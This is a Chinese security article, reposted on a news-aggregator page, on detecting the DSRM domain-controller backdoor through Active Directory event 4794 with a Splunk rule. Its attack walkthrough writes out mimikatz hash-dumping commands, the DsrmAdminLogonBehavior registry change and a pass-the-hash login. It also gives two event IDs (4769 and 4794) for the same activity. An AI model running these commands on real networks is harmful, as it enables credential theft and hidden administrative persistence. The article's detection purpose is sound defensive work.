全球观察:基于AD Event日志实时检测DSRM后门

2023-01-12 01:54:23 来源:程序员客栈

01、简介


(资料图)

每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator”,基本很少会被重置,因此有着极强的隐蔽性。攻击者通过获取域控的DSRM密码,就可以使用帐户通过网络登录到域控服务器,从而达到权限维持的目的。

域内权限维持的方式有很多,每增加一条安全检测规则,就多一层安全保障。针对DSRM后门,基于AD Event日志能够帮助我们提供什么维度的检测,我们通过一个后门利用实例来看一下。

02、利用方式

(1)获取域内用户Hash

使用mimikatz查看域内用户test的NTLM Hash。

mimikatz # privilege::debugmimikatz # lsadump::lsa /patch /name:test

(2)将DSRM帐户和域用户的NTLM Hash同步

使用DSRM的密码和指定域用户test的密码进行同步,在命令行环境中使用ntdsutil工具重置DSRM管理员密码。

(3)抓取DSRM密码

因同步域内用户test的NTLM Hash,可以发现,DSRM Hash 和域用户test的NTLM Hash一致。

mimikatz#privilege::debugmimikatz # token::elevatemimikatz # lsadump::sam

(4)修改DSRM登录方式

DSRM 有三种登录方式,具体如下:

0:默认值,只有当域控制器重启并进入 DSRM 模式时,才可以使用 DSRM 管理员账号1:只有当本地 AD、DS 服务停止时,才可以使用 DSRM 管理员账号登录域控制器2:在任何情况下,都可以使用 DSRM 管理员账号登录域控制器

如果要使用 DSRM 账号通过网络登录域控制器,需要将该值设置为 2。

修改注册表:

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /f /v DsrmAdminLogonBehavior /t REG_DWORD /d 2

(5)使用DSRM远程登录

在域成员服务器上使用DSRM进行远程登录,注意domain使用域控的主机名。

mimikatz # privilege::debugmimikatz # sekurlsa::pth /user:administrator /domain:win-dc01 /ntlm:44f077e27f6fef69e7bd834c7242b040

03、攻击检测

当攻击者尝试重置DSRM管理员密码或是指定域内用户NTLM Hash同步时,都会生成4769事件,因此可以实时监控4794事件,一旦攻击者尝试修改DSRM密码就会触发告警。

4794事件:每次更改目录还原模式(DSRM)管理员密码时,就会生成此事件,包含SID和帐户名,以及调用方工作站。

安全规则:

index=ad  EventCode=4794 | stats count earliest(_time) AS start_time latest(_time) AS end_time  by dest user| eval start_time=strftime(start_time,"%Y-%m-%d %H:%M:%S")| eval end_time=strftime(end_time,"%Y-%m-%d %H:%M:%S") | eval message="在"+start_time+"到"+end_time+"时间内,域控服务器:"+dest +" 疑似DSRM域后门行为,试图设置目录服务还原模式管理员密码"+count+"次,操作账号:"+user| table start_time end_time user message

安全告警效果如下图:

全球观察:基于AD Event日志实时检测DSRM后门

2023-01-12

环球通讯!国家信息中心:智算中心的创新发展将成为经济增长的新动力引擎

2023-01-11

当前热议!冬天穿衣就是要“舒服”!跟着博主这样穿,从内到外都挑不出毛病

2023-01-11

环球热资讯!农发行武冈市支行“开门红”投放2.05亿元贷款 助力打造产业振兴样板

2023-01-11

天天热门:白酒板块1月10日涨0.51%,舍得酒业领涨,北向资金增持10.48亿元

2023-01-11

天天速讯:爬山虎哲理句子(精选124句)

2023-01-10

世界消息!立方风控鸟·晚报(1月9日)

2023-01-10

天天精选!如何处理无民事行为能力人的侵权责任?

2023-01-10

焦点滚动:甘肃电投: 关于非公开发行股票导致股东权益变动的提示性公告

2023-01-10

最新资讯:新特能源(01799.HK)现涨超5%,截至发稿,涨4.67%,报15.68港元,成交额7208万港元

2023-01-10

全球报道:彭水房产纠纷律师费用多少

2023-01-10

观点:网贷逾期五至九天不还会怎样?

2023-01-10

每日视讯:众安小贷逾期22天延迟还款会上征信系统吗

2023-01-10

世界观天下!亚太国家频现牛市 QDII基金全力布局新兴市场 今年选“哪款”?

2023-01-09

【全球播资讯】微博关闭胡某宇事件相关谣言首发账号

2023-01-09

世界今亮点!新业态新农人如何助力乡村振兴?专家:为农业现代化建设提供支撑

2023-01-09

新动态:一个大概率不会让你后悔的投资

2023-01-07

【天天报资讯】河北省发改委通知 “一户多人口”不再执行居民阶梯电价

2023-01-06

环球热讯:银保监会通报四家险企偿付能力数据不实

2023-01-06

世界热推荐:连天美张翼:医美行业既要坚守安全底线,也要追求营销创新

2023-01-06

天天热讯:「明日天气预报」焦作2023年01月06日天气预报,晴,西风转西北风3-4级转<3级

2023-01-06

焦点消息!岳麓山索道门票学生票多少钱?

2023-01-06

【世界聚看点】中汇集团(00382.HK)涨超9%,盘中高见4.24港元创2022年1月份以来新高,近一月股价累涨逾1倍

2023-01-06

全球今亮点!华明装备1月5日快速上涨

2023-01-05

环球速递!饰品板块1月4日涨1.09%,ST爱迪尔领涨,主力资金净流出1758.06万元

2023-01-05

全球讯息:巴中商品房买卖纠纷律师费用大概需要多少钱

2023-01-05

当前速读:卢伟冰出手太狠,友商棋差一招,Redmi K60究竟领先同行多少?

2023-01-04

天天亮点!中科江南收到深交所关注函 分析公司近期股价涨幅较大的原因

2023-01-04

天天播报:外观大气时尚,内饰豪华典雅,昂科威Plus绝了

2023-01-04

天天观热点:中一科技:公司与宁德时代合作稳定,同时也有新增客户和订单,目前公司在手订单充足

2023-01-04

Copyright ©  2015-2022 东方频道网版权所有  备案号:沪ICP备2020036824号-8   联系邮箱:562 66 29@qq.com